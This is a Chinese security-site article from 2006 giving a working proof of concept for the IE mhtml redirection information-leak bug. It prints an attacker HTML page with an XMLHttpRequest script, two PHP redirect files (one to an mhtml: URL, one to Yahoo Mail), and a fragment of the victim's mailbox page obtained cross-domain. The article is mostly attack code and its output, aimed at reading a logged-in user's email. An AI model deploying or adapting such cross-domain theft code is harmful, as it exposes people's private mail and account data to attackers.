首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
IE mhtml redirection漏洞利用方法
来源:http://www.ph4nt0m.org 作者:yunshu 发布时间:2006-05-15  

IE mhtml redirection漏洞利用方法

Author:yunshu_[At]_ph4nt0m.org
Team:http://www.ph4nt0m.org
Data: 2006-05-11

这个漏洞主要是信息泄露,参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全,xmlhttp是无法跨域获取信息的。但是IE出现安全问题,在服务端通过mhtml重定向漏洞,可以利用xmlhttp 跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后,通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0,我使用IE7同样遭到攻击。

下面是主页面,通过xmlhttp请求本域的页面。(这里改成直接访问其他域会出现拒绝访问错误)

<html>


<head>

<script language="JavaScript">

// Start XML HTTP Request Object


var request = InitXMLHttpRequest();

function StartTest()


{


document.getElementById("result").innerHTML = "init ok<br />";


document.getElementById("result").innerHTML += "begain open<br /> ";

// Open/


request.open('GET', 'http://www.icylife.net/valu1.php', true);

document.getElementById("result").innerHTML += "begain send<br /> ";

request.onreadystatechange = WhenDone;

// Make the request


request.send();


}

// Function for Initialising the XMLHttpRequest


function InitXMLHttpRequest()


{


var request;

try


{


request = new XMLHttpRequest();


}


catch (trymicrosoft)


{


try


{


request = new ActiveXObject("Msxml2.XMLHTTP");


}


catch (othermicrosoft)


{


try


{


request = new ActiveXObject("Microsoft.XMLHTTP");


}


catch (failed)


{


request = false;


}


}


}

// Initialised?


if ( !request )


{


alert("Due to limitations of your browser you will not be able to use this page.");


}


else


{


return request;


}


}

function WhenDone( )


{


if ( request.readyState == 4 )


{


document.getElementById("result").innerHTML = request.responseText;


}


}

</script>


</head>

<body>

<b>Start the test:</b><br>


<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>


</html>


这里是第二个页面,利用mhtml重定向,代码很简单。

<?php


header("Location: mhtml://http://icylife.net/valu2.php");


?>

再就是第三个,重定向到yahoo mail。

<?php


header("Location: http://mail.yahoo.com.cn/");


?>

我登陆了mail之后,攻击结果片段如下:

<html>


<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">



<title>


Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>


<script type="text/javascript">


<!--


if(typeof top.frames["wmailmain"] != "undefined") window.open("http://mail.yahoo.com", "_top");


// -->


</script>

<noscript>


<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">


</noscript>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Php5 GPC绕过缺陷
·ipb search.php 漏洞分析及思考
·[xfocus-SD-060314]Microsoft Of
·Backdoor.Win32.IRCBot.st 蠕虫
·ICQ Toolbar 1.3 for IE多个安全
·Xlight FTP Server远程缓冲区溢
·新浪UC ActiveX多个远程栈溢出漏
·Windows GDI32.DLL WMF 渲染引擎
·WordPress wp-trackback.php漏洞
·[xfocus-SD-060101]AIX getComma
·Microsoft IIS远程拒绝服务漏洞
·阿里巴巴淘宝旺旺ActiveX远程栈
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved